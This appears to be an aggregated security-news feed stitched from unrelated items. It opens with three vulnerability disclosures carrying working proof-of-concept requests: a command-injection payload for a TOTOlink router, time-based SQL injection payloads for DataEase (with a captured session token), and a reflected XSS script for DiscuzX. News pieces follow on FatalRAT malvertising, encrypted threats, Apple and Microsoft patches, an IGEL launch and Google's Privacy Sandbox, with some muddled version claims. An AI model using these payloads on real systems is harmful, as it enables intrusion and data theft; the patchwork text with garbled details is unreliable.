TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the city parameter at setting/delStaticDhcpRules.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取city参数下的内容传递给v12，之后将v12带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"city":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-24238: ttt/20 at main · Am1ngl/ttt

Chinese-speaking individuals in Southeast and East Asia are the targets of a new rogue Google Ads campaign that delivers remote access trojans such as FatalRAT to compromised machines.
The attacks involve purchasing ad slots to appear in Google search results that direct users searching for popular applications to rogue websites hosting trojanized installers, ESET said in a report published

Chinese-speaking individuals in Southeast and East Asia are the targets of a new rogue Google Ads campaign that delivers remote access trojans such as FatalRAT to compromised machines.

The attacks involve purchasing ad slots to appear in Google search results that direct users searching for popular applications to rogue websites hosting trojanized installers, ESET said in a report published today. The ads have since been taken down.

Some of the spoofed applications include Google Chrome, Mozilla Firefox, Telegram, WhatsApp, LINE, Signal, Skype, Electrum, Sogou Pinyin Method, Youdao, and WPS Office.

"The websites and installers downloaded from them are mostly in Chinese and in some cases falsely offer Chinese language versions of software that is not available in China," the Slovak cybersecurity firm said, adding it observed the attacks between August 2022 and January 2023.

A majority of the victims are located in Taiwan, China, and Hong Kong, followed by Malaysia, Japan, the Philippines, Thailand, Singapore, Indonesia, and Myanmar.

The most important aspect of the attacks is the creation of lookalike websites with typosquatted domains to propagate the malicious installer, which, in an attempt to keep up the ruse, installs the legitimate software, but also drops a loader that deploys FatalRAT.

In doing so, it grants the attacker complete control of the victimized computer, including executing arbitrary shell commands, running files, harvesting data from web browsers, and capturing keystrokes.

"The attackers have expended some effort regarding the domain names used for their websites, trying to be as similar to the official names as possible," the researchers said. "The fake websites are, in most cases, identical copies of the legitimate sites."

The findings arrive less than a year after Trend Micro disclosed a Purple Fox campaign that leveraged tainted software packages Adobe, Google Chrome, Telegram, and WhatsApp as an arrival vector to propagate FatalRAT.

They also arrive amid a broader abuse of Google Ads to serve a wide range of malware, or alternatively, take users to credential phishing pages.

In a related development, Symantec's Threat Hunter Team shed light on another malware campaign that targets entities in Taiwan with a previously undocumented .NET-based implant dubbed Frebniis.

"The technique used by Frebniis involves injecting malicious code into the memory of a DLL file (iisfreb.dll) related to an IIS feature used to troubleshoot and analyze failed web page requests," Symantec said.

"This allows the malware to stealthily monitor all HTTP requests and recognize specially formatted HTTP requests sent by the attacker, allowing for remote code execution."

The cybersecurity firm, which attributed the intrusion to an unknown actor, said it's currently not known how access to the Windows machine running the Internet Information Services (IIS) server was obtained.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Using Google Ads to Spread FatalRAT Malware Disguised as Popular Apps

It's a classic attacker move: Use security protections against those who deploy them. But organizations can still defuse and prevent these encrypted attacks.

Once upon a time, encrypted traffic was considered the safe, secure option for browsing and doing business online. However, going back to December 2013, the Google Transparency Report shows just 48% of Web traffic was encrypted. Flash forward to today, and the volume of encrypted Web traffic is up to 95%. However, the threat landscape has changed a lot since 2013, and now we find the majority of cyberthreats lurking within encrypted channels.

Hidden in your encrypted Internet traffic layers are malware payloads, phishing scams, sensitive data leaks, and more. To understand this better, the State of Encrypted Attacks 2022 Report analyzed 24 billion threats from October 2021 to September 2022 to reveal details on threats embedded in HTTPS traffic, including SSL and TLS. The report shows a consistent upward trend of attacks using encrypted channels — from 57% in 2020 to 80% in 2021 — ultimately finding that more than 85% of attacks were encrypted in 2022. There were other major findings as well.

**Most Encrypted Threats Involve Malware**

While cybercriminals hide a variety of attack tactics in encrypted traffic, malware remains the most prevalent. Malicious scripts and payloads used throughout the attack sequence make up nearly 90% of the encrypted attack tactics blocked in 2022.

    

Fig. 1. Distribution of 2022 encrypted attacks. Source: Zscaler ThreatLabz

Malware continues to pose the greatest threat to individuals and businesses across nine key industries, with manufacturing, education, and healthcare the most common targets. This category includes ransomware, which remains a top concern for CISOs, as ransomware attacks have increased by 80% year over year.

The most prevalent malware families the ThreatLabz team observed abusing encrypted channels include ChromeLoader, Gamaredon, AdLoad, SolarMarker, and Manuscrypt.

**US, India Are Top Targets for Encrypted Attacks**

The five countries most targeted by encrypted attacks in 2022 were the US, India, South Africa, the UK, and Australia. In addition, several countries saw significant upticks in targets year over year, including Japan (+613%), the US (+155%), and India (+87%).

**Encrypted Attacks Increased in Manufacturing, Education**

More than doubling in encrypted attacks (239%), manufacturing displaced technology as the most targeted industry in 2022. Encrypted attacks against the education industry were also up significantly (134%). Attackers particularly favored manufacturing over other sectors as a target for ad spyware. It is also one of two industries most often phished via encrypted channels — the other being healthcare.

    

Fig. 2. Top vertical industries targeted by encrypted attacks in 2022. Source: Zscaler ThreatLabz

Today, most attacks leverage SSL or TLS encryption, which is resource-intensive to inspect at scale and best done with a cloud-native proxy architecture. While legacy firewalls support packet filtering and stateful inspection, their resource limitations make them poorly suited for this task. This creates a critical need for organizations to implement cloud-native architectures that support full inspection of encrypted traffic in alignment with zero-trust principles.

**How to Protect Yourself**

For defenders, the imperative is clear: all encrypted traffic must be thoroughly inspected to detect and stop cyberthreats before they cause damage. While we wait for governments, compliance frameworks, and other vendors to catch up with this reality, it will be up to defenders and leaders to raise the flag and champion initiatives to mitigate this common threat tactic. Zero-trust strategies and architectures — in which you trust nobody and inspect and authenticate everything — are the most effective way to protect your organization from encrypted attacks and other advanced threats.

Attacks start with reconnaissance and an initial compromise of an endpoint or asset exposed to the Internet. Once inside, attackers perform lateral propagation, including reconnaissance and establishing a network foothold. Finally, attackers act to achieve their objectives, which often involve data exfiltration.

Your defenses should include controls for each of those stages. Minimize the attack surface by making internal apps invisible to the Internet, and prevent compromise by using cloud-native proxy architecture to inspect _all_ traffic inline and at scale, enforcing consistent security policies. Organizations should also stop lateral movement by connecting users directly to applications (rather than the network) to reduce the attack surface, and contain threats using deception and workload segmentation. They can also stop data loss by inspecting all Internet-bound traffic, including encrypted channels, to prevent data theft.

If you are looking to minimize the risk of encrypted attacks for your organization, consider these recommendations as part of your adoption strategy:

*   Use a cloud-native, proxy-based architecture to decrypt, detect, and prevent threats in all encrypted traffic at scale.
*   Leverage an AI-driven sandbox to quarantine unknown attacks and stop patient-zero malware.
*   Inspect all traffic, all the time, whether a user is at home, at headquarters, or on the go, to ensure everyone is consistently protected against encrypted threats.
*   Terminate every connection to allow an inline proxy architecture to inspect all traffic, including encrypted traffic, in real-time — before it reaches its destination — to prevent ransomware, malware, and more.
*   Protect data using granular context-based policies, verifying access requests and rights based on context.
*   Eliminate the attack surface by connecting users directly to the apps and resources they need, never to networks.

Read more Partner Perspectives from Zscaler.

Encrypted Traffic, Once Thought Safe, Now Responsible For Most Cyberthreats

SQL Injection vulnerability in dataease before 1.2.0, allows attackers to gain sensitive information via the orders parameter to /api/sys_msg/list/1/10.

\*\*DataEase \*\*  
1.1.0-rc2

**Bug 描述**  
SQL Injection

\*\*Bug \*\*  
url:/api/sys\_msg/list/1/10

    POST /api/sys_msg/list/1/10 HTTP/1.1
    Host: demo.dataease.io
    Cookie: sysUiInfo={%22ui.logo%22:{%22paramKey%22:%22ui.logo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:1%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginLogo%22:{%22paramKey%22:%22ui.loginLogo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:2%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginImage%22:{%22paramKey%22:%22ui.loginImage%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:3%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginTitle%22:{%22paramKey%22:%22ui.loginTitle%22%2C%22paramValue%22:%22%E4%BA%BA%E4%BA%BA%E5%8F%AF%E7%94%A8%E7%9A%84%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%8F%AF%E8%A7%86%E5%8C%96%E5%88%86%E6%9E%90%E5%B7%A5%E5%85%B7%22%2C%22type%22:%22text%22%2C%22sort%22:4%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.title%22:{%22paramKey%22:%22ui.title%22%2C%22paramValue%22:%22%22%2C%22type%22:%22text%22%2C%22sort%22:5%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.favicon%22:{%22paramKey%22:%22ui.favicon%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:6%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.demo.tips%22:{%22paramKey%22:%22ui.demo.tips%22%2C%22paramValue%22:%22user:%20demo%20password:%20dataease%22%2C%22type%22:%22text%22%2C%22sort%22:100%2C%22file%22:null%2C%22fileName%22:null}}; language=zh_CN; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Length: 65
    Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
    Link-Pwd-Token: undefined
    Accept-Language: zh-CN
    Sec-Ch-Ua-Mobile: ?0
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Type: application/json;charset=UTF-8
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Origin: https://demo.dataease.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.dataease.io/?
    Accept-Encoding: gzip, deflate
    Connection: close
    
    {"orders":["(select*from(select+sleep(10)union/**/select+1)a) "]}
    

  
  
payload：extractvalue('anything',concat('~',(select database())))

CVE-2021-38239: [Bug]SQL Injection · Issue #510 · dataease/dataease

Cross site scripting (XSS) vulnerability in DiscuzX 3.4 allows attackers to execute arbitrary code via the datetline, title, tpp, or username parameters via the audit search.

**Description**

Admin backend audit search of content audit component with reflected-XSS in POST value “dateline”, “title”, “tpp” and “username”, which bypassed discuz security check and even could hijack callback url link, and it can also inject javascript to setTimeout at the end of html response.

**Affected Version**

DiscuzX <= 3.4, SC\_UTF8\_20221111

**POC**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  

POST /cms/discuz/upload/admin.php?action=moderate&operation=threads HTTP/1.1  
Host: 192.168.0.4  
Content-Length: 166  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.0.4  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.0.4/cms/discuz/upload/admin.php?action=moderate&operation=threads  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: 5Kkn\_2132\_saltkey=y03s5T45; 5Kkn\_2132\_lastvisit=1668496347; 5Kkn\_2132\_ulastactivity=07108qps3b3FkXEEZNxrT%2BtyQpXYN9%2FSOodQCNbMLoO%2BO6DOk8pF; 5Kkn\_2132\_auth=7791L55DZFdkAgcM5rDcnjIiVH0t%2BptlGCIqLkAhUIRMsUDTnq%2BGi7atBCt%2BPdyl2mCVv0hA3jA%2BxaOfDB1h; 5Kkn\_2132\_lastcheckfeed=1%7C1668501456; 5Kkn\_2132\_nofavfid=1; 5Kkn\_2132\_sid=yhpz44; 5Kkn\_2132\_lip=172.17.0.1%2C1668502019; 5Kkn\_2132\_lastact=1668502045%09admin.php%09  
Connection: close  
  
formhash=288a0c1d&scrolltop=&anchor=&username=aa&title=aa&tpp=20&filter=normal&modfid=all&dateline=604"></a><script>alert(1)</script><!--&modsubmit=%E6%8F%90%E4%BA%A4  

**Reference**

*   Gitee Issues (Login Required)
*   CVE

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2022-45543: Vulnerability - Discuz X3.4 Backend Reflected XSS (CVE-2022-45543)

By Deeba Ahmed
If you are using an Apple product, it is time to update it right now and make sure the automatic updates are enabled.
This is a post from HackRead.com Read the original post: Update Now: iOS Devices Receive Vital Security Updates from Apple

Apple has released an emergency security patch to fix a critical vulnerability that has been targeting all iOS devices, including iPhones, Macbooks, and Tablets.

Apple has released urgent security patches for a newly detected zero-day vulnerability that can be exploited to hack vulnerable iOS devices, including Macs, iPhones, and iPads.

The vulnerability (tracked as CVE-2023-23529) was found in the WebKit framework of the browser. So, if maliciously designed web content is processed, it would allow arbitrary code execution after an unsuspecting user visits a compromised URL.

“Apple is aware of a report that this issue may have been actively exploited,” the company noted. This explains why the iPhone maker released patches urgently for its flagship devices.

Still, the impact is extensive, as from the iPhone 8 to all subsequent iPhone models will be impacted, as well as every model of iPad Pro, the iPad Air 3rd generation and above, iPad 5th generation and above, and iPad mini 5th generation.

**Which Devices are Impacted?**

An unidentified researcher discovered the flaw, which has been patched with the latest edition of security updates. Apple didn’t specify how this vulnerability could be exploited.

In fact, it is the first time a zero-day has been defined as a newly discovered security flaw. It is a WebKit confusion issue. Moreover, all Macs running Ventura will be impacted. Fixes for all these versions were released in the security update.

**Security Update Details**

The small point update released by Apple on Monday contains WebKit security patches for iOS 16.3.1, iPadOS 16.3.1, and macOS 11.2.1 to fix a zero-day bug. The updates are available for iOS 16, iPadOS 16, macOS Ventura, and the latest edition of Apple Safari, as well as the preceding versions of Big Sur and macOS Monterey.

In addition, Apple released patches for tvOS 16.3.2 and watchOS 9.3.1. The company has yet to release the CVE entries, though. It is also unclear if a fix will be released for iOS 15 devices. If you haven’t updated your device, please do so immediately to stay safe.

1.  Microsoft fixes 6 Active 0-Day Windows Flaws
2.  Israeli Spyware Vendor Exploiting Chrome 0day
3.  Apple Debuts Lockdown Mode to Prevent Spying
4.  Apple Bug bounty: Hack Apple and earn big bucks

Update Now: iOS Devices Receive Vital Security Updates from Apple

**MUNICH, February 15, 2023 –** IGEL, provider of the managed endpoint operating system for secure access to any digital workspace, today announced IGEL COSMOS. Unveiled at DISRUPT23 – The Ultimate Global EUC event in Munich, COSMOS is a unified, agile platform to securely manage and automate the delivery of digital workspaces, from any cloud. Offering a modular architecture, granular endpoint control and end-user freedom, COSMOS is designed to enable organizations to garner the full power of current-day and future clouds with extensive control, while powering great user experiences for today’s hybrid work.

The most significant new advancement with IGEL COSMOS is that, for the first time, IGEL is completely separating the base IGEL OS from its validated and integrated applications and interfaces, while adding an additional separate component in the form of value-added cloud services. Together, these three vital components comprise IGEL COSMOS. This modular architecture of “separate but equal” elements of endpoint operating system, management and control, and cloud services enables maximum IT flexibility in introducing or enhancing apps, desktops, services, and any other form of cloud-delivered digital workspaces as the cloud continues to evolve.

Featuring extensive management and control powered by the new IGEL UMS 12, the next generation of the IGEL Universal Management Suite (UMS), COSMOS enables the parallel use, management and control of endpoints running both IGEL OS 11 and the new IGEL OS 12 operating system. New cloud services, which are de-coupled from the OS, include the IGEL App Portal for use-case specific software applications offered from IGEL software partners and available for seamless download and implementation. Additional cloud services include the IGEL Onboarding Service, IGEL Insight Service, and other services and portals all designed to enhance effectiveness and user experiences for both IT professionals and end users. 

“Today’s workspaces are hybrid. Hybrid work, hybrid clouds and hybrid applications. While VDI and DaaS continue to provide organizations the safest way to deliver secure access to windows client server applications, a transition to SaaS and web-based applications has already started.  IT organizations need to make sure they can evolve at their optimal pace and at the same time, enable employees seamless, yet secure access to their cloud workspaces,” said Matthias Haas, Chief Technology Officer, IGEL. “The COSMOS platform has been designed for this new era of hybrid work. With a new modularized version of IGEL OS, a new version of our UMS management platform coupled with new cloud services that extend capabilities and enhance user experiences, COSMOS enables unmatched speed and flexibility to our customers across traditional and modern application delivery models, while still retaining security, management, and control across the entire endpoint estate.” 

“Having deployed IGEL OS to our remote workforce, we have been excited to pilot the latest innovation from IGEL including UMS 12 and IGEL OS 12,” said Simon Barlow, Group Chief Technology Officer, Operations, AXA UK & Ireland. “Our remote workforce, the agile application landscape and more frequent update cycles of unified comms require us to onboard, manage and update our endpoints faster and more efficiently than ever before. Based on our initial testing of OS 12, we are already confident that we can remotely configure, update, and patch our remote machines faster and more efficiently. With small updates and the ability to only update the Azure Virtual Desktop client, IGEL COSMOS allows us to be more agile without compromising security or change control. We are excited about the new cloud services which complement IGEL OS and UMS 12 and are proud to be included in the COSMOS platform launch.”

“Having utilized the secure IGEL OS for our VMware VDI environment, we were excited to work with IGEL on the IGEL OS 12 pilot,” said Billy Cruz, Technology Services Manager, Desktop Engineering, COCC. “The ability to update the VMware Horizon client independently from IGEL OS in the new offering allows us to deploy the latest innovation from VMware faster and more efficiently than before. The additional ability to now also update the Zoom and Webex offloading clients, independently from the VMware Horizon app, also provides additional flexibility and reduces the amount of time needed to perform management updates to increase employee experience. With a smaller attack surface and faster updates, we are excited about rolling out IGEL OS 12 in the future.”

**The Powerful, Unified Components of COSMOS**

At the core of the IGEL COSMOS platform is the new IGEL UMS 12, which offers a unified view across a heterogeneous mix of endpoints running either IGEL OS 11 or the new IGEL OS 12. This powerful, yet simple to use, management and control console enables environments already benefitting from IGEL OS to easily migrate and leverage immediate value of COSMOS without requiring an OS upgrade on all their existing devices. 

Released with COSMOS is the new IGEL OS 12 which is more lightweight and adaptable than ever. Offering increased flexibility, speed, and agile integrations, IGEL OS 12 has been architected to support any form of cloud-delivered digital experiences. It also supports a faster, more efficient delivery of features and applications tuned to specific use cases via the IGEL App Portal.  Other key services tuned to IGEL OS 12 include fast user onboarding and deep insights into endpoint usage, security, status, and compliance of IGEL UMS-managed endpoints. 

One of the most significant new cloud services adding additional value to COSMOS is the IGEL App Portal. The App Portal delivers a full range of validated applications from IGEL’s vast IGEL Ready technology partner community designed for use on IGEL OS-powered devices. Since the App Portal operates separately and independently from the IGEL OS endpoint operating system, it sharply streamlines the process of application integration, introduction, and qualification for IT teams since there is no longer any dependence on the classic, highly integrated software release process. Available for download at no extra cost, these apps can be rapidly qualified and delivered as a feature-rich experience for users, while reducing the app qualification, implementation and update processes for IT. Applications include the Microsoft Azure Virtual Desktop client, VMware Horizon client, Citrix Workspace app, Chromium Browser, Zoom Media Plugins for VDI and many more. IGEL also offers an IGEL OS API (application programming interface) for software providers that want to validate their solution for availability using COSMOS and the IGEL App Portal. 

**Availability**

COSMOS, IGEL UMS 12, and IGEL OS 12 will be available April 1. Existing users of IGEL OS 11 will be able to engage IGEL UMS 12 via an easy migration to access COSMOS advancements for existing and new devices running IGEL OS 12 in the future. For more information visit igel.com/cosmos. To schedule a discovery meeting and get early access to GA code, visit igel.com/yes.

**DISRUPT23**

COSMOS was announcement from DISRUPT23 – The Ultimate Global EUC in Munich, held February 15 and 16 at the INFINITY Hotel & Conference Resort. DISRUPT23 will hold its North American installment at the Gaylord Opryland Resort & Convention Center in Nashville, Tennessee, on April 3-5. Registration is $399 per person. To register, visit: www.disruptEUC.com.

**About IGEL**

Today, the world of work is hybrid. Multiple clouds can deliver applications sourced from anywhere to a widely distributed workforce using all types of devices. Right at the moment when the world of work needs it most, IGEL has the solution for fully managed, secure endpoint access to any digital workspace that gives IT teams strong control and end-users the freedom to work as they wish in a hybrid world. Enabling choice of any cloud, from any device, anywhere, IGEL unlocks a collaborative and productive end user computing experience while solving the common security and management challenges required to compete and win in today’s world of hybrid work.  With a growing ecosystem of more than 100 IGEL Ready technology partners, IGEL has offices in Europe and the United States and is represented by partners in over 50 countries. For more information on IGEL, visit www.igel.com.

IGEL Unveils COSMOS, the Unified End User Computing Platform for Secure, Managed Access to Any Cloud Workspace

Google announced on Tuesday that it's officially rolling out Privacy Sandbox on Android in beta to eligible mobile devices running Android 13.
"The Privacy Sandbox Beta provides new APIs that are designed with privacy at the core, and don't use identifiers that can track your activity across apps and websites," the search and advertising giant said. "Apps that choose to participate in the Beta

Google announced on Tuesday that it's officially rolling out Privacy Sandbox on Android in beta to eligible mobile devices running Android 13.

"The Privacy Sandbox Beta provides new APIs that are designed with privacy at the core, and don't use identifiers that can track your activity across apps and websites," the search and advertising giant said. "Apps that choose to participate in the Beta can use these APIs to show you relevant ads and measure their effectiveness."

Devices that have been selected for the Beta test will have a Privacy Sandbox section within Settings so as to allow users to control their participation as well as view and manage their top interests as determined by the Topics API to serve relevant ads.

The initial Topics taxonomy is set to include somewhere between a few hundred and a few thousand topics, according to Google, and will be human-curated to exclude sensitive topics.

The Beta test is expected to start off with a "small percentage" of Android 13 devices and will gradually expand over time.

The Privacy Sandbox on Android is Google's answer to Apple's App Tracking Transparency (ATT), which requires app developers to seek users' explicit consent before tracking their online behavior across apps and websites through unique identifiers. It was introduced by Apple in iOS 14.5.

The experiment is part of a broader initiative for the web that also aims to begin phasing out third-party cookies in the Chrome web browser by 2024.

The technology that underpins its ability to glean users' evolving interests is a machine learning technique called federated learning that decouples the "ability to do machine learning from the need to store the data in the cloud."

This effectively allows decentralized edge devices such as smartphones to learn a shared prediction model while keeping all the training data on device, thereby making it possible for websites to access information about consumers without compromising user privacy.

Currently, Android devices are assigned a unique user-resettable identifier that can be used by app developers for tracking online behavior. Privacy Sandbox replaces the identifier with a set of privacy-preserving tools that are engineered to limit information sharing and at the same time support personalized ads.

While Google's proposals hope to strike a balance between interest-based advertising and privacy, the company also criticized that "blunt approaches" such as those from Apple don't provide viable alternatives.

That having said, Apple's ATT has faced criticism of its own. In September 2021, Lockdown Privacy called Apple's policy "functionally useless in stopping third-party tracking" and that it "made no difference in the total number of active third-party trackers."

What's more, a report from the Financial Times in December 2021 found that apps are continuing to track users on iOS, albeit in an anonymized and aggregated fashion similar to Google's Privacy Sandbox.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Rolling Out Privacy Sandbox Beta on Android 13 Devices

Microsoft on Tuesday released security updates to address 75 flaws spanning its product portfolio, three of which have come under active exploitation in the wild.
The updates are in addition to 22 flaws the Windows maker patched in its Chromium-based Edge browser over the past month.
Of the 75 vulnerabilities, nine are rated Critical and 66 are rated Important in severity. 37 out of 75 bugs are

Patch Tuesday / Software Updates

Microsoft on Tuesday released security updates to address 75 flaws spanning its product portfolio, three of which have come under active exploitation in the wild.

The updates are in addition to 22 flaws the Windows maker patched in its Chromium-based Edge browser over the past month.

Of the 75 vulnerabilities, nine are rated Critical and 66 are rated Important in severity. 37 out of 75 bugs are classified as remote code execution (RCE) flaws. The three zero-days of note that have been exploited are as follows -

*   **CVE-2023-21715** (CVSS score: 7.3) - Microsoft Office Security Feature Bypass Vulnerability
*   **CVE-2023-21823** (CVSS score: 7.8) - Windows Graphics Component Elevation of Privilege Vulnerability
*   **CVE-2023-23376** (CVSS score: 7.8) - Windows Common Log File System (CLFS) Driver Elevation of Privilege Vulnerability

"The attack itself is carried out locally by a user with authentication to the targeted system," Microsoft said in advisory for CVE-2023-21715.

"An authenticated attacker could exploit the vulnerability by convincing a victim, through social engineering, to download and open a specially crafted file from a website which could lead to a local attack on the victim computer."

Successful exploitation of the above flaws could enable an adversary to bypass Office macro policies used to block untrusted or malicious files or gain SYSTEM privileges.

CVE-2023-23376 is also the third actively exploited zero-day flaw in the CLFS component after CVE-2022-24521 and CVE-2022-37969 (CVSS scores: 7.8), which were addressed by Microsoft in April and September 2022.

"The Windows Common Log File System Driver is a component of the Windows operating system that manages and maintains a high-performance, transaction-based log file system," Immersive Labs' Nikolas Cemerikic said.

"It is an essential component of the Windows operating system, and any vulnerabilities in this driver could have significant implications for the security and reliability of the system."

It's worth noting that Microsoft OneNote for Android is vulnerable to CVE-2023-21823, and with the note-taking service increasingly emerging as a conduit for delivering malware, it's crucial that users apply the fixes.

Also addressed by Microsoft are multiple RCE defects in Exchange Server, ODBC Driver, PostScript Printer Driver, and SQL Server as well as denial-of-service (DoS) issues impacting Windows iSCSI Service and Windows Secure Channel.

Three of the Exchange Server flaws are classified by the company as "Exploitation More Likely," although successful exploitation requires the attacker to be already authenticated.

Exchange servers have proven to be high-value targets in recent years as they can enable unauthorized access to sensitive information, or facilitate Business Email Compromise (BEC) attacks.

**Software Patches from Other Vendors**

Besides Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Android
*   Apple
*   Atlassian
*   Cisco
*   Citrix
*   CODESYS
*   Dell
*   Drupal
*   F5
*   GitLab
*   Google Chrome
*   HP
*   IBM
*   Intel
*   Juniper Networks
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NETGEAR
*   NVIDIA
*   Palo Alto Networks
*   Qualcomm
*   Samba
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   Sophos
*   Synology
*   Trend Micro
*   VMware
*   Zoho, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Update Now: Microsoft Releases Patches for 3 Actively Exploited Windows Vulnerabilities

Microsoft Edge (Chromium-based) Tampering Vulnerability

Tag

#chrome